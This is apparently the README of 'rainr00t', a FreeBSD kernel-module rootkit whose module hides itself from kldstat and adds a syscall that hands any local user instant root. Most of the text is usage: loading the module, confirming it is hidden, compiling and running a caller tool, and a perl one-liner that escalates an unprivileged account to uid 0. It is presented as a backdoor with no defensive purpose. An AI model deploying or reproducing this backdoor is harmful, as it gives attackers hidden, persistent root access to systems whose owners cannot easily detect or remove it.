60 lines
1.6 KiB
Plaintext
60 lines
1.6 KiB
Plaintext
rainr00t
|
|
========
|
|
|
|
instant root-priv backd00r via kernelland anyone? get root and hide the module.
|
|
well this module, once loaded gives the thread/user calling instantly root, without spawning an extra
|
|
shell or alike.
|
|
|
|
new feature in version 0.2
|
|
--------------------------
|
|
|
|
automaticly hiding the loaded module, be aware that you cant easily unload it now ;)
|
|
|
|
usage
|
|
-----
|
|
|
|
kernel
|
|
******
|
|
root@crashb0x:~/gainroot # uname -a
|
|
FreeBSD crashb0x 10.1-RELEASE FreeBSD 10.1-RELEASE #0 r274401: Tue Nov 11 21:02:49 UTC 2014 root@releng1.nyi.freebsd.org:/usr/obj/usr/src/sys/GENERIC amd64
|
|
|
|
root@crashb0x:~/gainroot # kldload ./rainroot.ko
|
|
root@crashb0x:~/gainroot # kldstat
|
|
Id Refs Address Size Name
|
|
1 3 0xffffffff80200000 1755658 kernel
|
|
|
|
No rainroot in kldstat, just the default kernel.
|
|
|
|
userland
|
|
********
|
|
|
|
# userland tool, to call the newly loaded syscall (normally its syscall 210, depending if you got extra syscalls on your box already) In this examples it is syscall nr 211.
|
|
|
|
compile it
|
|
l00ser@crashb0x:/tmp $ gcc48 caller.c -o caller
|
|
|
|
test for help
|
|
# ./caller
|
|
rainroot caller
|
|
use appropiate syscallnumber (default: 210)
|
|
example: ./caller 210
|
|
|
|
execute and get root
|
|
l00ser@crashb0x:/tmp % ./caller 211
|
|
l00ser@crashb0x:/tmp % id
|
|
uid=0(root) gid=0(wheel) egid=1001(l00ser) groups=1001(l00ser)
|
|
|
|
besides the caller you could also go with every language or operation requesting the syscall. for instance
|
|
this perl one-liner:
|
|
|
|
l00ser@crashb0x:~ % id
|
|
uid=1001(l00ser) gid=1001(l00ser) groups=1001(l00ser)
|
|
l00ser@crashb0x:~ % perl -e 'syscall(211);'
|
|
l00ser@crashb0x:~ % id
|
|
uid=0(root) gid=0(wheel) egid=1001(l00ser) groups=1001(l00ser)
|
|
|
|
author
|
|
------
|
|
dash
|
|
|